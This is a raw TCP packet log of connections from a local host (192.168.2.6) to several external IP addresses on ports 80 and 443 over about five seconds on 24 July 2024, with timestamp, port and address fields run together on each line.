                                                                                        Jul 24, 2024 07:14:37.491790056 CEST804972785.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.491889000 CEST4972780192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:37.515593052 CEST49754443192.168.2.620.190.160.17
                                                                                        Jul 24, 2024 07:14:37.515670061 CEST4434975420.190.160.17192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.515750885 CEST49754443192.168.2.620.190.160.17
                                                                                        Jul 24, 2024 07:14:37.515981913 CEST49754443192.168.2.620.190.160.17
                                                                                        Jul 24, 2024 07:14:37.516006947 CEST4434975420.190.160.17192.168.2.6
                                                                                        Jul 24, 2024 07:14:38.318403006 CEST4434975420.190.160.17192.168.2.6
                                                                                        Jul 24, 2024 07:14:38.318624973 CEST49754443192.168.2.620.190.160.17
                                                                                        Jul 24, 2024 07:14:38.398099899 CEST49754443192.168.2.620.190.160.17
                                                                                        Jul 24, 2024 07:14:38.398147106 CEST4434975420.190.160.17192.168.2.6
                                                                                        Jul 24, 2024 07:14:38.399046898 CEST4434975420.190.160.17192.168.2.6
                                                                                        Jul 24, 2024 07:14:38.411360979 CEST49754443192.168.2.620.190.160.17
                                                                                        Jul 24, 2024 07:14:38.411413908 CEST49754443192.168.2.620.190.160.17
                                                                                        Jul 24, 2024 07:14:38.411462069 CEST4434975420.190.160.17192.168.2.6
                                                                                        Jul 24, 2024 07:14:38.754905939 CEST4434975420.190.160.17192.168.2.6
                                                                                        Jul 24, 2024 07:14:38.754972935 CEST4434975420.190.160.17192.168.2.6
                                                                                        Jul 24, 2024 07:14:38.755017996 CEST4434975420.190.160.17192.168.2.6
                                                                                        Jul 24, 2024 07:14:38.755058050 CEST49754443192.168.2.620.190.160.17
                                                                                        Jul 24, 2024 07:14:38.755084991 CEST4434975420.190.160.17192.168.2.6
                                                                                        Jul 24, 2024 07:14:38.755115032 CEST49754443192.168.2.620.190.160.17
                                                                                        Jul 24, 2024 07:14:38.755347967 CEST4434975420.190.160.17192.168.2.6
                                                                                        Jul 24, 2024 07:14:38.756135941 CEST49754443192.168.2.620.190.160.17
                                                                                        Jul 24, 2024 07:14:38.764352083 CEST49754443192.168.2.620.190.160.17
                                                                                        Jul 24, 2024 07:14:38.764352083 CEST49754443192.168.2.620.190.160.17
                                                                                        Jul 24, 2024 07:14:38.764384985 CEST4434975420.190.160.17192.168.2.6
                                                                                        Jul 24, 2024 07:14:38.764406919 CEST4434975420.190.160.17192.168.2.6
                                                                                        Jul 24, 2024 07:14:39.705612898 CEST44349716173.222.162.64192.168.2.6
                                                                                        Jul 24, 2024 07:14:39.705679893 CEST49716443192.168.2.6173.222.162.64
                                                                                        Jul 24, 2024 07:14:39.804255009 CEST49756443192.168.2.635.190.72.216
                                                                                        Jul 24, 2024 07:14:39.804286003 CEST4434975635.190.72.216192.168.2.6
                                                                                        Jul 24, 2024 07:14:39.805268049 CEST49756443192.168.2.635.190.72.216
                                                                                        Jul 24, 2024 07:14:39.811851978 CEST49756443192.168.2.635.190.72.216
                                                                                        Jul 24, 2024 07:14:39.811862946 CEST4434975635.190.72.216192.168.2.6
                                                                                        Jul 24, 2024 07:14:40.282470942 CEST4434975635.190.72.216192.168.2.6
                                                                                        Jul 24, 2024 07:14:40.282790899 CEST49756443192.168.2.635.190.72.216
                                                                                        Jul 24, 2024 07:14:40.293291092 CEST49756443192.168.2.635.190.72.216
                                                                                        Jul 24, 2024 07:14:40.293308973 CEST4434975635.190.72.216192.168.2.6
                                                                                        Jul 24, 2024 07:14:40.293459892 CEST49756443192.168.2.635.190.72.216
                                                                                        Jul 24, 2024 07:14:40.293562889 CEST4434975635.190.72.216192.168.2.6
                                                                                        Jul 24, 2024 07:14:40.294018984 CEST49756443192.168.2.635.190.72.216
                                                                                        Jul 24, 2024 07:14:40.311945915 CEST4975780192.168.2.634.107.221.82
                                                                                        Jul 24, 2024 07:14:40.316781998 CEST804975734.107.221.82192.168.2.6
                                                                                        Jul 24, 2024 07:14:40.320673943 CEST4975780192.168.2.634.107.221.82
                                                                                        Jul 24, 2024 07:14:40.321119070 CEST4975780192.168.2.634.107.221.82
                                                                                        Jul 24, 2024 07:14:40.325872898 CEST804975734.107.221.82192.168.2.6
                                                                                        Jul 24, 2024 07:14:40.785394907 CEST804975734.107.221.82192.168.2.6
                                                                                        Jul 24, 2024 07:14:40.853497028 CEST4975880192.168.2.634.107.221.82
                                                                                        Jul 24, 2024 07:14:40.858659983 CEST804975834.107.221.82192.168.2.6
                                                                                        Jul 24, 2024 07:14:40.858880997 CEST4975880192.168.2.634.107.221.82
                                                                                        Jul 24, 2024 07:14:40.859090090 CEST4975880192.168.2.634.107.221.82
                                                                                        Jul 24, 2024 07:14:40.864516973 CEST804975834.107.221.82192.168.2.6
                                                                                        Jul 24, 2024 07:14:40.923321962 CEST4975780192.168.2.634.107.221.82
                                                                                        Jul 24, 2024 07:14:41.312366962 CEST804975834.107.221.82192.168.2.6
                                                                                        Jul 24, 2024 07:14:41.377162933 CEST4975880192.168.2.634.107.221.82
                                                                                        Jul 24, 2024 07:14:41.780294895 CEST49759443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:41.780338049 CEST44349759172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:41.780508995 CEST49760443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:41.780616999 CEST44349760172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:41.781071901 CEST49761443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:41.781117916 CEST44349761172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:41.781446934 CEST49759443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:41.781555891 CEST49761443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:41.781569958 CEST49760443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:41.781719923 CEST49762443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:41.781727076 CEST44349762172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:41.781981945 CEST49759443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:41.781992912 CEST44349759172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:41.782124043 CEST49760443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:41.782146931 CEST44349760172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:41.782219887 CEST49761443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:41.782234907 CEST44349761172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:41.782304049 CEST49762443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:41.782526016 CEST49762443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:41.782537937 CEST44349762172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:41.896724939 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:41.896759987 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:41.896914005 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:41.901067019 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:41.901079893 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:41.901906013 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:41.901936054 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:41.902322054 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:41.902401924 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:41.902410984 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.245352983 CEST49770443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.245444059 CEST44349770172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.245542049 CEST49771443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.245583057 CEST49770443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.245594978 CEST44349771172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.245661974 CEST49771443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.245804071 CEST49770443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.245837927 CEST44349770172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.245938063 CEST49771443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.245959044 CEST44349771172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.255772114 CEST44349762172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.256563902 CEST49762443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.256573915 CEST44349762172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.259495974 CEST44349759172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.259730101 CEST49759443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.259758949 CEST44349759172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.260109901 CEST44349759172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.260404110 CEST44349762172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.260701895 CEST49759443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.260776997 CEST49762443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.260795116 CEST44349759172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.261100054 CEST49762443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.261275053 CEST44349762172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.263267040 CEST44349760172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.263808012 CEST49760443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.263859987 CEST44349760172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.264249086 CEST44349760172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.264897108 CEST49760443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.264966011 CEST44349760172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.297703028 CEST44349761172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.303317070 CEST49761443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.303332090 CEST44349761172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.305071115 CEST44349761172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.309195042 CEST49761443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.309390068 CEST49761443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.309489965 CEST44349761172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.332228899 CEST49762443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.332238913 CEST44349762172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.332293034 CEST49760443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.377784967 CEST49759443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.377872944 CEST49761443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.377886057 CEST44349761172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.378787994 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.378985882 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.378998995 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.379894972 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.384495974 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.384979010 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.385039091 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.386221886 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.386312008 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.386420965 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.428514957 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.468683004 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.483890057 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.483906031 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.485615969 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.485667944 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.486440897 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.486448050 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.486844063 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.488231897 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.495242119 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.495429039 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.495440006 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.527884007 CEST49762443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.536160946 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.536185980 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.536889076 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.536909103 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.536927938 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.536947012 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.540503025 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.544493914 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.547506094 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.547506094 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.547516108 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.547931910 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.570178986 CEST49761443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.570245028 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.570261955 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.590773106 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.590873957 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.591651917 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.591756105 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.591834068 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.591841936 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.591841936 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.591864109 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.591882944 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.592118979 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.592217922 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.592225075 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.592462063 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.592555046 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.592782974 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.592865944 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.592941999 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.594675064 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.594686985 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.595817089 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.596152067 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.596158028 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.620810986 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.620887041 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.621042967 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.621145964 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.621162891 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.621471882 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.621484041 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.621562004 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.621578932 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.621587992 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.621593952 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.621623039 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.622097969 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.622116089 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.622507095 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.622524023 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.623075962 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.623085022 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.623126984 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.623241901 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.623425007 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.623558044 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.623574018 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.624083042 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.624089003 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.626686096 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.628442049 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.628449917 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.675232887 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.675239086 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.678884029 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.679116964 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.679151058 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.679188967 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.679230928 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.679335117 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.679348946 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.679795027 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.679840088 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.679888010 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.679944992 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.679986954 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.680223942 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.680459023 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.680509090 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.680533886 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.680788040 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.680829048 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.680960894 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.681001902 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.681982040 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.682387114 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.682387114 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.682401896 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.682409048 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.682524920 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.683140039 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.683175087 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.683192015 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.683213949 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.683219910 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.683228016 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.683291912 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.683291912 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.683299065 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.683345079 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.686002970 CEST49765443192.168.2.6142.250.65.193
                                                                                        Jul 24, 2024 07:14:42.686008930 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.707570076 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.707653046 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.707760096 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.707835913 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.707851887 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.708081007 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.708102942 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.708132029 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.708745956 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.708918095 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.708937883 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.708945036 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.709207058 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.709232092 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.709248066 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.709606886 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.709611893 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.709964037 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.709997892 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.710186958 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.710211992 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.711129904 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.711256027 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.711276054 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.711468935 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.711499929 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.712430954 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.712579966 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.712598085 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.712614059 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.712858915 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.712873936 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.713035107 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.713056087 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.713217974 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.713244915 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.713268042 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.713315964 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.713325024 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.713959932 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.713959932 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.713988066 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.716583014 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.721745968 CEST44349771172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.721786022 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.721800089 CEST44349763142.251.35.163192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.733115911 CEST44349770172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.737030983 CEST49763443192.168.2.6142.251.35.163
                                                                                        Jul 24, 2024 07:14:42.743643999 CEST49770443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.743673086 CEST44349770172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.743833065 CEST49771443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.743864059 CEST44349771172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.744220018 CEST44349770172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.744424105 CEST44349771172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.746438980 CEST49771443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.746526003 CEST44349771172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.746690989 CEST49770443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:42.746782064 CEST44349770172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.766879082 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.766983986 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.767074108 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.767163038 CEST44349765142.250.65.193192.168.2.6
                                                                                        Jul 24, 2024 07:14:42.767250061 CEST44349765142.250.65.193192.168.2.6
